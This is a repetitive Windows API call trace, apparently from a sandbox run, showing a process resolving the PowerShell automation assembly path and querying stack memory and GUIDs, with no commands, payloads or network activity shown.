	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.469] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.469] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.470] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.470] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.470] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.471] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.471] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.471] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.471] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.471] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.472] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.472] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.472] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.472] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.472] VirtualQuery (in: lpAddress=0x28bb80, lpBuffer=0x28ca40, dwLength=0x30 | out: lpBuffer=0x28ca40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.472] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.473] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.473] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.473] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.473] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x6e6b8fda, Data2=0xb703, Data3=0x48be, Data4=([0]=0x9e, [1]=0x9b, [2]=0xe9, [3]=0x3e, [4]=0x8f, [5]=0x72, [6]=0xb9, [7]=0xf4))) returned 0x0
	[0401.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.474] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x23440c83, Data2=0x66ac, Data3=0x4cc6, Data4=([0]=0x86, [1]=0x8e, [2]=0x81, [3]=0x68, [4]=0xb5, [5]=0x82, [6]=0x81, [7]=0x48))) returned 0x0
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.477] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
